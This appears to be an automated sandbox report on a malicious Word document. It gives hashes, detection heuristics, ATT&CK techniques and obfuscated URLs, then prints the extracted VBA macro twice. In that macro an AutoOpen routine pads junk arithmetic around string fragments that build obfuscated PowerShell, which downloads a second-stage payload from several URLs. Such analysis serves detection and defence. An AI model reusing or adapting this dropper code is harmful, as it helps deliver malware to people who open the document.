Office (OLE) malware analysis — malicious · 37abffeb9cbbded5

MALICIOUS

Office (OLE)

197.5 KB Created: 2017-12-22 08:34:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 9fab19c8ab9e54170d6532a4b0137e02 SHA-1: 932aee4d587d64d547952c70fd0caa82413ea4c7 SHA-256: 37abffeb9cbbded5885c31d3f64f067e0a2a515747628afde066da5b6a8d6174

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within its VBA macros. The AutoOpen macro is present and configured to execute a function, which is a common technique for initiating malware execution. The VBA script likely downloads and executes a second-stage payload from one of the obfuscated URLs found in the evidence.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.floridalakebTE+bTEfbTE+bTEront.bTE+bTEprbTE+bTEopertibTE+bTEes/etfka+fkaNMp/,https://ilog3bTE+bTE6bTE+bTE0.com/xfbTE+bTEL0m/,http://maciani.cbTE+bTEomb In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 72393 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	72393 bytes
SHA-256: `e28fa2f831c61e51528cfa948b25335e61c221ffaf055136506e27c503391c50`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "dAPlfPBXIaNuUR" Sub AutoOpen() On Error Resume Next TBjMpIaKd = 871 / Rnd(4) + hwYQGEQiJ + wiWVouNFJtmXuB * 9 + Int(PzzbOvvwhqXFM * CStr(uOZtiQoiK)) + vuVAjbKCWa * CDate(3624 - 352183467 * 84 / 475) / FQDvEDiofRpAr - CSng(620) PfNdMkBko = 871 / Rnd(4) + jTZvMGjUilW + zWwdNGpfFFtdk * 9 + Int(NjpmZGR * CStr(WciIViwzHPVai)) + fiWuuIWaZvKJs * CDate(3624 - 352183467 * 84 / 475) / ivMPXIzVzFlHjI - CSng(620) wiIKVWBHP = 871 / Rnd(4) + MISwCizMpzS + DFCZrJjR * 9 + Int(ncOcumzn * CStr(wXjhDPqDTQ)) + YShqmaDI * CDate(3624 - 352183467 * 84 / 475) / irXwUYjETHvwZS - CSng(620) AufWBnjoq = 871 / Rnd(4) + JlUuXpTjr + sGzhMiimjLUIz * 9 + Int(jvHEBVNpBEojEl * CStr(inMHiatvzJX)) + wFizAlU * CDate(3624 - 352183467 * 84 / 475) / chPhWdCFu - CSng(620) scawGFXHB = 871 / Rnd(4) + ZmAJviQQk + FnzjYDwYil * 9 + Int(XoAEjwH * CStr(AHrzVvabXTDFN)) + jpFfqYCIz * CDate(3624 - 352183467 * 84 / 475) / QMBwAFOhJZk - CSng(620) Application.Run "fSQmfuCobEd", LdHBjfUP POocnzcYE = 871 / Rnd(4) + frFEKzBGior + OjIucbSF * 9 + Int(woiUbQCCba * CStr(uCkVvtpFMbak)) + HzFTtVAFzEjDX * CDate(3624 - 352183467 * 84 / 475) / jizDHOHNLznw - CSng(620) imMsuVDpM = 871 / Rnd(4) + LiJFZivzASY + GXNXSWlt * 9 + Int(FfvnOsGJNAhXH * CStr(QuCocSOwVa)) + fpfWDjETnF * CDate(3624 - 352183467 * 84 / 475) / NSLlonm - CSng(620) SqlwAzdQh = 871 / Rnd(4) + aZHKVNiC + nKTdEURNjjd * 9 + Int(iaLDjohpitmwv * CStr(OwssEciNAcwNj)) + jjzjDRwwvGl * CDate(3624 - 352183467 * 84 / 475) / BNstYUhMFS - CSng(620) UofBIQajF = 871 / Rnd(4) + HCGwwFvivP + mHiaVVG * 9 + Int(dfUYQPJ * CStr(CJjYMBO)) + zGtzSZDQq * CDate(3624 - 352183467 * 84 / 475) / hjAbmuTib - CSng(620) rmdqjmDsV = 871 / Rnd(4) + qplsMbPbI + EcDiAhcBbWlF * 9 + Int(aXfVQKKOjiCz * CStr(wonzXTKtWOj)) + pBKCRwdlHLUhGz * CDate(3624 - 352183467 * 84 / 475) / wXXuBiZln - CSng(620) End Sub Function LdHBjfUP() On Error Resume Next ztLjzVsV = 871 / Rnd(4) + zYddAKKt + qLzXXEhzQklHs * 9 + Int(StoKqjCYlWwQt * CStr(FcvWstqfjmsVAd)) + icCFjKk * CDate(3624 - 352183467 * 84 / 475) / zUKqRZba - CSng(620) mzAJhQ = 871 / Rnd(4) + qJwLQIPmBzm + NKjEdznE * 9 + Int(kcLYjQidlWEjtq * CStr(ufZJazaRR)) + tFkGOSXjdFh * CDate(3624 - 352183467 * 84 / 475) / mhrhJPahcUTO - CSng(620) oppMC = Mid("CvEmtd37nXvnLCGQk3),[chA'+'R]124'+' -REpLACe([c'+'hAR]98+[chAR]84+[chAR]69),[chAR]39-REpLACe fkaEl4fka,[chAR]36))').REPLacE(([Char]55+[Char]69+[CXcY", 18, 128) EQaAiW = 871 / Rnd(4) + LntopPOz + mKBSUjZ * 9 + Int(CttKNiVQwB * CStr(CZFILlKMjPtN)) + GiXaLhzbRwWhh * CDate(3624 - 352183467 * 84 / 475) / zEYYsNfwchCpjK - CSng(620) qQzcC = 871 / Rnd(4) + XjNNDJmUZC + wNiYWpkwCswKKs * 9 + Int(wbFUizhaFkQzU * CStr(NdCIswA)) + qlrNwibbYDVNNK * CDate(3624 - 352183467 * 84 / 475) / EYARncnGr - CSng(620) TDHSrdXpLkS = 871 / Rnd(4) + qFJjFEjKvE + CHkciaipN * 9 + Int(KrAAIJCq * CStr(VBpEbqNBbr)) + ucTiKYLzw * CDate(3624 - 352183467 * 84 / 475) / LqzOfOIjzuj - CSng(620) WwSthtI = Mid("mzOCni3cTEeJlz;foreachfka+fka(IfPabfka+fkac in'+' bTE+bTEIfbTE+bTEPbcd){bTE+bTEtbTE+bTEry{IbTE+bTEfPfranbTE+bTEcfka+f'+'ka.DownlobTE+bTEadFil'+'e(IfP'+'abbTE+bTEcYmvYSipN", 9, 154) WFrEHWBNtln = 871 / Rnd(4) + wpPuCRtpz + TdQACwiMNcHp * 9 + Int(NzjrjMU * CStr(fzwApMh)) + lbYNZvbIAO * CDate(3624 - 352183467 * 84 / 475) / wbsPHGmBwTZNc - CSng(620) idiVw = 871 / Rnd(4) + UTpWUROub + KdSrYiFB * 9 + Int(trbozzbl * CStr(VXAGqfkpSiaK)) + OzCdnUwUFGYYw * CDate(3624 - 352183467 * 84 / 475) / tfrXtjcZEJ - CSng(620) UTdqnJqtrmW = 871 / Rnd(4) + ioiSANmzqcB + bdSWbrRXVamj * 9 + Int(tDKkCLNviqGwp * CStr(BCBlQOYfIiasiv)) + JIBucGJ * CDate(3624 - 352183467 * 84 / 475) / MnRnntnLZlr - CSng(620) jSXbSqnmmzs = Mid("LbpVCo7UvXmj (' . ( 7E9PSHOmE[4]+7E9pShOmE[30]+fkaXfka) (((fka(bTEIf'+'Pfranc = nYS5ki8fBhO8SkA", 13, 69) IuNcWprVT = 871 / Rnd(4) + mnHiPab + AdbmTLG * 9 + Int(RPRchrHqKbHji * CStr(ovta ... (truncated)

SHA-256: e28fa2f831c61e51528cfa948b25335e61c221ffaf055136506e27c503391c50

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dAPlfPBXIaNuUR"
Sub AutoOpen()
On Error Resume Next
TBjMpIaKd = 871 / Rnd(4) + hwYQGEQiJ + wiWVouNFJtmXuB * 9 + Int(PzzbOvvwhqXFM * CStr(uOZtiQoiK)) + vuVAjbKCWa * CDate(3624 - 352183467 * 84 / 475) / FQDvEDiofRpAr - CSng(620)
PfNdMkBko = 871 / Rnd(4) + jTZvMGjUilW + zWwdNGpfFFtdk * 9 + Int(NjpmZGR * CStr(WciIViwzHPVai)) + fiWuuIWaZvKJs * CDate(3624 - 352183467 * 84 / 475) / ivMPXIzVzFlHjI - CSng(620)
wiIKVWBHP = 871 / Rnd(4) + MISwCizMpzS + DFCZrJjR * 9 + Int(ncOcumzn * CStr(wXjhDPqDTQ)) + YShqmaDI * CDate(3624 - 352183467 * 84 / 475) / irXwUYjETHvwZS - CSng(620)
AufWBnjoq = 871 / Rnd(4) + JlUuXpTjr + sGzhMiimjLUIz * 9 + Int(jvHEBVNpBEojEl * CStr(inMHiatvzJX)) + wFizAlU * CDate(3624 - 352183467 * 84 / 475) / chPhWdCFu - CSng(620)
scawGFXHB = 871 / Rnd(4) + ZmAJviQQk + FnzjYDwYil * 9 + Int(XoAEjwH * CStr(AHrzVvabXTDFN)) + jpFfqYCIz * CDate(3624 - 352183467 * 84 / 475) / QMBwAFOhJZk - CSng(620)
Application.Run "fSQmfuCobEd", LdHBjfUP
POocnzcYE = 871 / Rnd(4) + frFEKzBGior + OjIucbSF * 9 + Int(woiUbQCCba * CStr(uCkVvtpFMbak)) + HzFTtVAFzEjDX * CDate(3624 - 352183467 * 84 / 475) / jizDHOHNLznw - CSng(620)
imMsuVDpM = 871 / Rnd(4) + LiJFZivzASY + GXNXSWlt * 9 + Int(FfvnOsGJNAhXH * CStr(QuCocSOwVa)) + fpfWDjETnF * CDate(3624 - 352183467 * 84 / 475) / NSLlonm - CSng(620)
SqlwAzdQh = 871 / Rnd(4) + aZHKVNiC + nKTdEURNjjd * 9 + Int(iaLDjohpitmwv * CStr(OwssEciNAcwNj)) + jjzjDRwwvGl * CDate(3624 - 352183467 * 84 / 475) / BNstYUhMFS - CSng(620)
UofBIQajF = 871 / Rnd(4) + HCGwwFvivP + mHiaVVG * 9 + Int(dfUYQPJ * CStr(CJjYMBO)) + zGtzSZDQq * CDate(3624 - 352183467 * 84 / 475) / hjAbmuTib - CSng(620)
rmdqjmDsV = 871 / Rnd(4) + qplsMbPbI + EcDiAhcBbWlF * 9 + Int(aXfVQKKOjiCz * CStr(wonzXTKtWOj)) + pBKCRwdlHLUhGz * CDate(3624 - 352183467 * 84 / 475) / wXXuBiZln - CSng(620)
End Sub
Function LdHBjfUP()
On Error Resume Next
ztLjzVsV = 871 / Rnd(4) + zYddAKKt + qLzXXEhzQklHs * 9 + Int(StoKqjCYlWwQt * CStr(FcvWstqfjmsVAd)) + icCFjKk * CDate(3624 - 352183467 * 84 / 475) / zUKqRZba - CSng(620)
mzAJhQ = 871 / Rnd(4) + qJwLQIPmBzm + NKjEdznE * 9 + Int(kcLYjQidlWEjtq * CStr(ufZJazaRR)) + tFkGOSXjdFh * CDate(3624 - 352183467 * 84 / 475) / mhrhJPahcUTO - CSng(620)
oppMC = Mid("CvEmtd37nXvnLCGQk3),[chA'+'R]124'+' -REpLACe([c'+'hAR]98+[chAR]84+[chAR]69),[chAR]39-REpLACe fkaEl4fka,[chAR]36))').REPLacE(([Char]55+[Char]69+[CXcY", 18, 128)
EQaAiW = 871 / Rnd(4) + LntopPOz + mKBSUjZ * 9 + Int(CttKNiVQwB * CStr(CZFILlKMjPtN)) + GiXaLhzbRwWhh * CDate(3624 - 352183467 * 84 / 475) / zEYYsNfwchCpjK - CSng(620)
qQzcC = 871 / Rnd(4) + XjNNDJmUZC + wNiYWpkwCswKKs * 9 + Int(wbFUizhaFkQzU * CStr(NdCIswA)) + qlrNwibbYDVNNK * CDate(3624 - 352183467 * 84 / 475) / EYARncnGr - CSng(620)
TDHSrdXpLkS = 871 / Rnd(4) + qFJjFEjKvE + CHkciaipN * 9 + Int(KrAAIJCq * CStr(VBpEbqNBbr)) + ucTiKYLzw * CDate(3624 - 352183467 * 84 / 475) / LqzOfOIjzuj - CSng(620)
WwSthtI = Mid("mzOCni3cTEeJlz;foreachfka+fka(IfPabfka+fkac in'+' bTE+bTEIfbTE+bTEPbcd){bTE+bTEtbTE+bTEry{IbTE+bTEfPfranbTE+bTEcfka+f'+'ka.DownlobTE+bTEadFil'+'e(IfP'+'abbTE+bTEcYmvYSipN", 9, 154)
WFrEHWBNtln = 871 / Rnd(4) + wpPuCRtpz + TdQACwiMNcHp * 9 + Int(NzjrjMU * CStr(fzwApMh)) + lbYNZvbIAO * CDate(3624 - 352183467 * 84 / 475) / wbsPHGmBwTZNc - CSng(620)
idiVw = 871 / Rnd(4) + UTpWUROub + KdSrYiFB * 9 + Int(trbozzbl * CStr(VXAGqfkpSiaK)) + OzCdnUwUFGYYw * CDate(3624 - 352183467 * 84 / 475) / tfrXtjcZEJ - CSng(620)
UTdqnJqtrmW = 871 / Rnd(4) + ioiSANmzqcB + bdSWbrRXVamj * 9 + Int(tDKkCLNviqGwp * CStr(BCBlQOYfIiasiv)) + JIBucGJ * CDate(3624 - 352183467 * 84 / 475) / MnRnntnLZlr - CSng(620)
jSXbSqnmmzs = Mid("LbpVCo7UvXmj (' . ( 7E9PSHOmE[4]+7E9pShOmE[30]+fkaXfka) (((fka(bTEIf'+'Pfranc = nYS5ki8fBhO8SkA", 13, 69)
IuNcWprVT = 871 / Rnd(4) + mnHiPab + AdbmTLG * 9 + Int(RPRchrHqKbHji * CStr(ovta
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.